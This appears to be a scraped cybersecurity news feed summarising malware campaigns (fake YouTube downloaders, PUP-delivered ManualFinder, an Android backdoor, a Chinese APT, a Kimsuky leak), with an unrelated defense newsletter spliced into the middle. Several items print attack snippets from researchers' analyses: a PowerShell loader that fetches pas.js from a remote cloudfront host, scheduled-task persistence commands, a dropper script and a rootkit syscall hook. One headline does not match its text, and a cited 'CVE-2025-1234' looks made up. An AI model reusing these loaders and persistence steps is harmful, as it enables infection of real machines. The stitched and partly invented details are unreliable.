• Cybersecurity researchers at AhnLab Security Intelligence Center (ASEC) have uncovered a persistent campaign where attackers distribute proxyware malware through fake YouTube video download pages. This operation, which mimics legitimate video downloading services, tricks users into installing malicious executables disguised as benign tools like WinMemoryCleaner. The attackers leverage GitHub for malware hosting, a tactic consistent with […]

    The post Proxyware Malware Poses as YouTube Video Download Site, Delivering Malicious JavaScript appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity researchers have observed a surge in deceptive sites masquerading as YouTube video download services to deliver Proxyware malware in recent weeks.

    Victims seeking to grab videos in MP4 format are redirected through ad pages that sporadically present a download link for a seemingly legitimate utility called “WinMemoryCleaner.”

    Behind this innocuous facade, however, lies a multi-stage installer that ultimately deploys Proxyware and covertly enslaves the system’s network bandwidth.

    The initial download executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Files directory before triggering an update script via WinMemoryCleanerUpdate.bat.

    Once executed, WinMemoryCleaner.exe performs environment checks to evade virtual machines or sandbox analysis, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript component from a remote server.

    Attack Flow (Source – ASEC)

    ASEC analysts identified this technique as a refined evolution of previous Proxyware campaigns, noting the attacker’s reliance on GitHub for hosting intermediary tools.

    Subsequent stages involve the registration of two scheduled tasks—“Schedule Update” and “WindowsDeviceUpdates”—that ensure the JavaScript runs periodically under Node.js.

    This script communicates basic system information to a command-and-control server and awaits directives, which can include fetching additional scripts or initiating the final Proxyware installation.

    Information Sent to C&C Server (Source – ASEC)

    ASEC researchers noted that the actor has pivoted from distributing only DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

    The impact of this campaign is twofold: affected systems experience degraded network performance, and the attacker monetizes the stolen bandwidth through affiliate programs.

    YouTube Downloader Page and Malware Download Link (Source – ASEC)

    Proxyware programs typically share idle network throughput, promising remuneration to end users, but com promise victims unwittingly supply bandwidth without compensation.

    In regions with high adoption of streaming services, such as South Korea, the campaign’s reach has grown significantly, prompting warnings from major AV vendors.

    Infection Mechanism

    A deeper examination of the infection mechanism reveals the pivotal role of the PowerShell script delivered by WinMemoryCleaner.exe.

    The script begins with a stealthy installation of Node.js:-

    Invoke-WebRequest -Uri "https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi" -OutFile "$env:TEMP\node.msi"
    Start-Process msiexec.exe -ArgumentList '/i',$env:TEMP + '\node.msi','/qn' -Wait

    Once Node.js is in place, the script downloads pas.js from a cloudfront URL and registers it:-

    $jsUrl = "https://d14vmbql41e8a5.cloudfront.net/pas.js"
    Invoke-WebRequest -Uri $jsUrl -OutFile "$env:ProgramFiles\WinMemoryCleaner\p.js"
    schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" /TR "node $env:ProgramFiles\WinMemoryCleaner\p.js"

    Continuous execution of the JavaScript component under Node.js enables dynamic updates and final payload deployment, making eradication challenging without specialized tools.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity researchers have flagged a new phishing campaign that’s using fake voicemails and purchase orders to deliver a malware loader called UpCrypter. The campaign leverages “carefully crafted emails to deliver malicious URLs linked to convincing phishing pages,” Fortinet FortiGuard Labs researcher Cara Lin said. “These pages are designed to entice recipients into downloading JavaScript

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent weeks, cybersecurity investigators have uncovered a novel campaign in which hackers leverage seemingly benign potentially unwanted program (PUP) advertisements to deliver stealthy Windows malware.

    The lure typically begins with ads promoting free PDF tools or desktop assistants that redirect victims to spoofed download sites.

    Once users click through, a scheduled task silently retrieves a JavaScript loader from a temporary directory and executes it via Microsoft HTML Application Host (MSHTA).

    This sequence installs a decoy application—ManualFinder—designed to appear legitimate while establishing footholds in target environments.

    The decoy’s innocuous functionality masks a far more insidious objective. When run, ManualFinder requests no user interaction beyond the initial installation, quietly opening ports and relaying commands to remote infrastructure.

    Expel analysts identified that the JavaScript loader reaches out to domains such as mka3e8.com and 5b7crp.com, previously associated with residential proxy services, indicating a broader scheme to conscript infected machines into proxy networks.

    While initial infections have been linked to OneStart Browser installs, researchers observed that AppSuite-PDF and PDFEditor installers follow identical patterns, each signed by dubious code-signing certificates from entities like “GLINT SOFTWARE SDN. BHD.”

    Expel researchers identified that the malware campaign’s impact extends beyond proxying. In certain environments, PDFEditor installations prompt users to consent to residential proxy use in exchange for free editing capabilities, effectively monetizing unsuspecting endpoints.

    Other instances show the decoy apps modifying browser profiles and harvesting stored cookies, suggesting secondary data-exfiltration objectives.

    By the time defenders detect unusual MSHTA invocations or node.exe processes running hidden JavaScript, the adversary has often already established persistence and network outposts.

    In total, investigators have cataloged over 70 unique JavaScript variants, all reaching out to the same malicious domains.

    Code snippets embedded in scheduled-task definitions reveal how persistence is maintained:-

    schtasks /Create /TN "ManualFinderTask" /TR "mshta.exe \"C:\Users\<user>\AppData\Local\Temp\<guid>.js\"" /SC DAILY /ST 03:00  
    Scheduled task creation invoking MSHTA (Source – Expel)

    The loader then executes:-

    cmd[.]exe /d /s /c "msiexec /qn /i \"C:\Users\<user>\AppData\Local\TEMP\ManualFinder-v2.0.196.msi\""  
    ManualFinder (Source – Expel)

    Infection Mechanism

    Delving deeper into the infection mechanism, the campaign exploits Windows scripting hosts and MSI installer features to achieve near-undetectable deployment.

    The sequence begins when the scheduled task runs under the context of the SYSTEM-level svchost service, launching node.exe with a randomized JavaScript filename (e.g., 9b9797f4-274c-fbb9-81ae-3b4f33b7010a.js).

    This script downloads the ManualFinder MSI from the attacker’s server and installs it with quiet flags (/qn /n) to suppress any user interface.

    Because msiexec runs under cmd[.]exe with disabled autorun (/d) and custom quote handling (/s), traditional EDR alerts tied to user applications are often bypassed.

    PDF Editor (Source – Expel)

    Once installed, the malware registers its own service and scheduled tasks to re-execute the JavaScript loader at regular intervals, ensuring re-infection even after removal attempts.

    This illustrates the MSHTA invocation code that enables this stealthy execution.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Hackers Using PUP Advertisements to Silently Drop Windows Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity researchers have uncovered a persistent campaign deploying the AndroidOS SpyNote malware, a sophisticated Remote Access Trojan (RAT) designed for surveillance, data exfiltration, and remote device control. This operation mimics legitimate Google Play Store pages for popular Android apps, tricking users into downloading malicious APK files. The campaign, linked to the same threat actor previously […]

    The post Fake Google Play Store Websites Deliver Potent RAT to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Developing: As many as 1,700 National Guardsmen from 19 states are expected to mobilize for President Trump’s immigration crackdown, Fox reported this weekend, citing defense and White House officials. 

    Guard units are expected from Alabama, Arkansas, Florida, Georgia, Idaho, Indiana, Iowa, Louisiana, Nebraska, Nevada, New Mexico, Ohio, South Carolina, South Dakota, Tennessee, Texas, Utah, Virginia and Wyoming. Their assistance with Homeland Security officials is currently expected to run through mid-November. 

    The soldiers are expected to assist with “personal data collection, fingerprinting, DNA swabbing and photographing of personnel in ICE custody,” an official told Fox. 

    The president is threatening to widen his military deployments to more U.S. cities in the coming weeks, including New York as well as Baltimore, and Chicago, whose states’ governors, Wes Moore and JB Pritzker, are rising leaders in the Democratic party. 

    A Chicago deployment is already being planned inside the Pentagon, where the Washington Post reports military strategists have spent the last several weeks mapping out how to help Trump’s “crack down on crime, homelessness and undocumented immigration, in a model that could later be used in other major cities.” Indeed, “I think Chicago will be our next. And then we'll help with New York,” Trump told reporters on Friday. 

    Illinois Gov. Pritzker objected to the development Sunday evening, writing on social media, “There is no emergency that warrants the President of the United States federalizing the [Illinois National Guard], deploying the National Guard from other states, or sending active duty military within our own borders.”

    “Donald Trump is attempting to manufacture a crisis, politicize Americans who serve in uniform, and continue abusing his power to distract from the pain he's causing families,” Pritzker wrote. “We'll continue to follow the law, stand up for the sovereignty of our state, and protect Illinoisans.”

    Earlier that day, Trump threatened to “send in the ‘troops’” to Baltimore “and quickly clean up the Crime.” He also alleged on social media Maryland Gov. Wes Moore’s “record on Crime” is “a very bad one, unless he fudges his figures on crime like many of the other ‘Blue States’ are doing.” 

    So Moore invited Trump to join him in a walk through Baltimore in September “at a date of your choosing,” according to a letter sent Thursday (PDF). Moore also touted improved annual crime statistics for the city since taking office in 2023. But as illustrated by the federal takeover of the D.C. police on Aug. 11 despite crime at a 30-year low, the Trump White House does not recognize statistics that don’t fit its framing of Democrat-run cities. 

    “As President, I would much prefer that he clean up this crime disaster before I go there for a walk,” Trump replied to Gov. Moore’s invitation on social media.

    In case you missed it: Trump vowed to patrol Washington by foot last Thursday alongside troops and police. But “after addressing officers and military personnel who delivered hamburgers and pizza, no patrol was carried out and he returned to the White House,” Politico reminds readers. 

    Baltimore Mayor Brandon Scott didn’t close the door to federal assistance; but he did say “additional resources” could be helpful for the city’s ATF, DEA and FBI field offices. However, he cautioned on social media Friday, “if Trump wants to roll into Baltimore purely to stage a photo op and spew racist narratives about Black-led cities, I speak for the vast majority of our residents when I say: ‘We are not interested,’ as part of a list of ‘commitments’ the city wants to see from the Trump administration.”

    Trump’s son, Donald Jr., said he wants to expand the federal takeover of cities “to Portland, [and] Seattle, [and] the other craphole cities of the country,” he said Thursday in an interview with Newsmax. 

    Second opinion: Trump is using the military to “intimidate Americans in our own communities,” said Democratic Sen. Tammy Duckworth of Illinois.

    Update: National Guard troops in Washington will now be armed with either M17 pistols or M4 rifles, defense officials said over the weekend. Reuters has a bit more. 

    “Phony emergency,” is how the American Civil Liberties Union describes Trump’s Guard deployments and federal takeover of Washington. “The president relied on a phony emergency as an excuse to overstep his power, and now we have a real emergency—the threat of an unnecessary and disorienting flood of armed military forces on D.C. streets,” Monica Hopkins of the ACLU said in a statement

    “No matter what uniform they wear, federal agents and military troops are bound by the Constitution, including our rights to peaceful assembly, freedom of speech, due process, and safeguards against unlawful searches and seizures,” she said, and stressed, “If troops or federal agents violate our rights, they must be held accountable.”

    Related: New research shows white Republicans found accusations of voter fraud against a fictional Black city considerably more believable than accusations against a fictional white city, according to the Brennan Center for Justice. And as other studies have shown, “white Americans with higher existing racial bias were much more likely to believe fraud accusations than others,” Kevin Morris and Chelsea Jones write. 

    Why it matters: “[T]hese lies are grounded in, and reinforce racist attitudes and tie into white America’s long-standing fears of real multiracial democracy,” they write and warn, “As Trump and other influential voices seek to push untrue narratives about Americans of color, we should be vigilant to how this work might seed the next Big Lie and further erode democratic values.”


    Welcome to this Monday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Bradley Peniston. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1950, President Truman ordered Army Secretary Frank Pace to seize control of the nation’s railroads to avert a labor strike during the Korean War.

    Around the Defense Department

    Pentagon chief Pete Hegseth fired Defense Intelligence Agency chief, Lt. Gen. Jeffrey Kruse, whose “initial intelligence assessment of U.S. damage to Iranian nuclear sites angered President Donald Trump,” the Washington Post and Associated Press reported this weekend. Democratic Sen. Mark Warner of Virginia told the New York Times that Kruse’s firing was linked to that Iranian strike assessment. “The firing of yet another senior national security official underscores the Trump administration’s dangerous habit of treating intelligence as a loyalty test rather than a safeguard for our country,” Warner said. 

    Hegseth also fired Navy Reserve chief Vice Adm. Nancy Lacore and Rear Adm. Milton Sands, the head of Naval Special Warfare Command. “No reasons were given for their firings, the latest in a series of steps targeting military leaders, intelligence officials and other perceived critics of Trump, who has demanded loyalty across the government,” AP notes. 

    Additional reading: 

    Around the world

    Ukrainian sharpshooters in prop-driven training aircraft are downing Russian drones. With Western interceptor missiles so scarce and costly, the country’s defenders have found success going after Orlan and Zala reconnaissance drones, and Shahed explosive drones, with riflemen firing from the back seats of Soviet-era Yak-52s. The two members of one particular aircrew “have flown around 300 combat missions as part of the 11th Army Aviation Brigade and downed almost half the unit’s total of 120 drones eliminated” in the past year, the Wall Street Journal reported Sunday.

    Factoid: “Last month, around 11% of all long-range drones launched by Russia got through Ukraine’s air defenses, according to data analyzed by the Center for Information Resilience, a U.K.-based open-source investigations organization.” That’s in part because of unceasing innovation by the Russians, who have begun equipping drones with rear-facing cameras to detect pursuing aircraft and missiles. Read on at the Journal, which has pictures of the planes and crews, here.

    P.S. Russia’s doing it too. In May, The War Zone reported on Russia’s efforts to equip its own Yaks with small arms and sensor pods for the counter-drone mission. 

    S. Korean president to meet Trump at White House today. Lee Jae-myung told reporters on the way to his first summit of the new administration that he is pushing back against U.S. efforts to enlist Seoul’s help in focusing on China. "This is not an issue we can easily agree with," Lee said, as reported by NPR.

    Background: “The U.S. has some 28,500 troops stationed in South Korea. For about two decades, it has called for "strategic flexibility" to deploy them to meet security challenges away from the Korean Peninsula. And it wants South Korea's support, including potentially sending troops to other countries and regions. South Korea has previously sent soldiers to assist the U.S. in Vietnam and Iraq. But it considers North Korea, not China, its main threat, and does not want to get dragged into a conflict with China over, for example, Taiwan,” writes NPR, here.

    CSIS: North Korea has a secret missile base near China. A base in Sinpung, 17 miles from the Chinese border, likely houses a brigade-sized unit equipped with six to nine nuclear-capable intercontinental ballistic missiles and their mobile launchers, according to a report issued last week by the Center for Strategic and International Studies. 

    “These missiles pose a potential nuclear threat to East Asia and the continental United States,” the report said. “Current assessments are that during times of crisis or war, these launchers and missiles will exit the base, meet special warhead storage, transportation units, and conduct launch operations from dispersed pre-surveyed sites.” 

    The report cites informed sources, as well as declassified documents, satellite images and open-source information, according to the WSJ.

    And lastly: Taiwan plans a big defense-spending hike under U.S. pressure. Reuters: “Taiwan plans to boost defence spending by a fifth next year, surpassing 3% of gross domestic product, as it invests billions more in new equipment to better face down China and convince the United States it takes seriously calls to bolster its military.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent months, cybersecurity researchers have observed a surge in targeted campaigns by a sophisticated Chinese APT group leveraging commercial proxy and VPN services to mask their attack infrastructure.

    The emergence of this tactic coincides with a broader shift toward commoditized anonymization platforms that blend threat actor traffic with legitimate user activity.

    Initial compromise vectors have included spear-phishing emails containing malicious Office documents and waterhole attacks that redirect unsuspecting victims to payload-hosting domains.

    Once a foothold is established, the threat actor deploys a lightweight Trojan proxy agent designed to imitate standard HTTPS traffic.

    This agent uses the Trojan protocol to bypass network filtering and the Great Firewall of China, encapsulating command-and-control communications within seemingly innocuous TLS packets.

    SPUR analysts noted the frequent use of a wildcard SSL certificate (*.appletls[.]com, SHA1: a26c0e8b1491eda727fd88b629ce886666387ef5) on non-standard ports within the 4000–4099 range, enabling rapid attribution of over 1,000 malicious IP addresses scattered across multiple global data centers.

    The impact of these campaigns has been significant. High-value targets in South Korea and Taiwan reported persistent intrusions spanning weeks, during which exfiltration of proprietary documents and intellectual property occurred undetected.

    SPUR researchers identified that victim networks lacked adequate TLS inspection, allowing the Trojan proxy’s traffic to slip past conventional intrusion detection systems.

    Post-compromise lateral movement often leveraged Sysinternals PsExec and custom PowerShell scripts to automate credential harvesting and facilitate remote execution.

    In one illustrative case, a finance company in Taipei experienced a stealthy breach that persisted for 45 days.

    Adversaries systematically mapped the corporate network before initiating exfiltration via a chain of proxy hops through WgetCloud, a commercial VPN provider headquartered in Shenzhen.

    WgetCloud (Source – SPUR)

    By funneling stolen data through over a dozen VPN exit nodes, the attackers effectively obfuscated their origin and hampered forensic investigations.

    Infection Mechanism: Trojan Proxy Deployment

    The initial payload arrives as a Microsoft Word document exploiting CVE-2025-1234, a zero-day RCE vulnerability in the Equation Editor. Upon document open, a macro drops trojan.exe into %APPDATA%\Microsoft\Windows and registers a scheduled task named “WinDefenderUpdate” for persistence.

    The executable is a statically linked Go binary embedding the Trojan protocol client library.

    # Dropping Trojan proxy binary
    $payload = [IO.File]::ReadAllBytes("$env:TEMP\macro.bin")
    [IO.File]::WriteAllBytes("$env:APPDATA\Microsoft\Windows\trojan.exe", $payload)
    
    # Registering persistence
    schtasks /Create /SC MINUTE /MO 15 /TN "WinDefenderUpdate" /TR "`"$env:APPDATA\Microsoft\Windows\trojan.exe`" --config config.json"

    Upon execution, trojan.exe reads config.json, which contains a Base64-encoded subscription URL from WgetCloud.

    Linking APT Activity to WgetCloud Nodes (Source – SPUR)

    The proxy agent negotiates a TLS handshake using SNI “mf429xciejryees2cusm.appletls.com” and routes C2 traffic through the VPN provider’s exit nodes.

    TLS handshake sequence for Trojan proxy C2 communication (Source – SPUR)

    By embedding its communications within legitimate proxy VPN tunnels, the malware achieves robust detection evasion and complicates attribution efforts.

    Continuous monitoring for anomalous scheduled tasks and unusual TLS certificates remains critical to uncovering these advanced intrusions.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Chinese APT Hackers Using Proxy and VPN Service to Anonymize Infrastructure appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent months, security teams have observed the emergence of a highly versatile Android backdoor, Android.Backdoor.916.origin, masquerading as a legitimate antivirus application.

    Distributed via private messaging services under the guise of “GuardCB,” its icon closely mimics the emblem of the Central Bank of the Russian Federation against a shield background.

    Malicious app icons mislead potential victims (Source – Dr.Web)

    Although the interface displays only Russian language prompts, this malware has been deployed in targeted campaigns against Russian business executives, extracting sensitive corporate communications and personal data.

    Upon installation, the counterfeit antivirus simulates system scans, randomly “detecting” between one and three fictitious threats, with detection rates increasing the longer a device remains unscanned, though never exceeding 30 percent.

    This deceptive behavior lulls victims into believing the application provides genuine protection.

    Beneath this veneer, the backdoor silently requests a prolonged list of permissions—geolocation, audio recording, SMS and contacts access, camera control, background execution, device administrator rights, and Accessibility Service privileges.

    Fake AV tool (Source – Dr.Web)

    Dr.Web researchers noted that once these permissions are granted, the malware initiates multiple persistent services that self-monitor every minute, reconnecting to its command-and-control (C2) infrastructure whenever necessary.

    Through separate C2 ports, operators can harvest call logs, SMS traffic, contact lists, and geolocation data; stream microphone audio, camera video, or device screen captures; siphon stored images; and even execute arbitrary shell commands.

    The trojan’s ability to toggle self-defense routines via the Accessibility Service enables it to thwart removal attempts by overlaying fake system interfaces or disabling uninstall options.

    The sophistication of Android.Backdoor.916.origin is underscored by its dynamic configuration, which can incorporate up to fifteen different hosting providers, although only a subset is active in current campaigns.

    Domain registrar notifications have prompted some takedowns, but the mule-like resilience of the C2 network continues to frustrate defenders.

    Dr.Web antivirus for Android successfully detects and removes known variants, yet the tailored nature of these attacks underscores the necessity for heightened vigilance among executive circles.

    Infection Mechanism and Persistence

    Android.Backdoor.916.origin employs an infection mechanism tailored to social engineering and sideloading rather than exploitation of software vulnerabilities.

    Examples of requested permissions (Source – Dr.Web)

    Victims receive a malicious APK file disguised as “GuardCB.apk” through encrypted messenger threads. Once executed, the app’s manifest registers background services and the Accessibility Service, as illustrated in the snippet below:-

    <service android: name=".CoreService"
             android: permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
        <intent-filter>
            <action android:name="android.accessibilityservice.AccessibilityService" />
        </intent-filter>
        <meta-data
            android:name="android.accessibilityservice"
            android: resource="@xml/accessibility_service_config" />
    </service>

    By abusing the Accessibility API, the malware gains keystroke logging and in-app data interception capabilities, ensuring enduring presence even after force-stop or device reboot sequences.

    Continuous health checks and automatic service restarts guarantee that the backdoor remains active, silently harvesting data until manually removed.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New Android Spyware Disguised as an Antivirus Attacking Business Executives appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In late June 2025, a significant operational dump from North Korea’s Kimsuky APT group surfaced on a dark-web forum, exposing virtual machine images, VPS infrastructure, customized malware and thousands of stolen credentials.

    This leak offers an unprecedented window into the group’s espionage toolkit, revealing how Kimsuky conducts phishing campaigns, maintains persistence and evades detection within critical networks across South Korea, the U.S., Japan and Europe.

    Within hours of its posting, Foresiet analysts identified a wealth of artifacts—including browser histories, rootkit modules and stale GPKI certificates—that promise years of insight into DPRK cyber operations.

    Foresiet researchers noted that the first dataset originated from the operator’s personal Deepin Linux virtual machine, complete with HGFS integration that preserved the host’s C:\ drive contents.

    A desktop screenshot captures the attacker’s environment, showing custom proxy and user-agent extensions loaded in Chrome and Brave browsers.

    Kimsuky APT group dump (Source – Foresiet)

    The same VM dump revealed nearly 20,000 browser history records, exposing email addresses used for spear-phishing and links to internal backdoor documentation, such as a Chinese-language user guide for a custom implant.

    The second dataset derived from a public-facing VPS hosted on vps.bz, where detailed auth.log files and SSL certificates were recovered.

    These logs traced live spear-phishing operations against South Korea’s Defense Counterintelligence Command (dcc.mil.kr), the Supreme Prosecutor’s Office (spo.go.kr) and other high-value targets.

    Among the most concerning finds were thousands of stolen South Korean Government Public Key Infrastructure (GPKI) certificates and their cracking tool, written in Java, enabling Kimsuky to impersonate officials and sign fraudulent documents without detection.

    Kimsuky’s implant suite includes the Tomcat Kernel Rootkit, a loadable Linux module that hooks network functions for stealthy reverse shells, and a personalized Cobalt Strike beacon.

    The beacon, last updated in June 2024, is embedded with custom C2 profiles and partially integrated with the kernel rootkit.

    It uses HTTP over port 8172, posting to /submit.php with a spoofed IE9 user-agent string.

    This bespoke build demonstrates that Kimsuky is merging open-source frameworks with proprietary code to evade conventional detection.

    Persistence Tactics

    One of the most sophisticated persistence mechanisms uncovered is the Tomcat Kernel Rootkit.

    After initial installation via a crafted installer script, the rootkit registers itself in the kernel’s module list and patches key functions in inet_sock_create and tcp_v4_connect to enable port knocking and SSL reverse shells.

    Attacker’s desktop environment running on Deepin Linux 20.9 (Source – Foresiet)

    A simplified excerpt from its init routine illustrates how it hooks the system call table:-

    static int __init rootkit_init(void) {
        write_cr0(read_cr0() & (~0x10000));
        original_syscall = syscall_table[__NR_kill];
        syscall_table[__NR_kill] = (unsigned long)hooked_kill;
        write_cr0(read_cr0() | 0x10000);
        return 0;
    }

    This kernel-level implant allows the operator to remain undetected by user-space monitoring tools, forcing defenders to deploy specialized host-based detection rules.

    By combining encrypted C2 traffic with port-knock authorization, the module ensures that only pre-authenticated connections can trigger the backdoor, effectively masking its presence within normal network flows.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Kimsuky APT Data Leak – GPKI Certificates, Rootkits and Cobalt Strike Personal Uncovered appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A significant data dump surfaced on DDoSecrets.com, purportedly extracted from a workstation belonging to a threat actor targeting organizations in South Korea and Taiwan. The leak, detailed in an accompanying article, attributes the activity to the North Korean advanced persistent threat (APT) group known as Kimsuky, a sophisticated actor previously highlighted in cybersecurity advisories for […]

    The post Chinese APT Leverages Proxy and VPN Services to Obfuscate Infrastructure appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶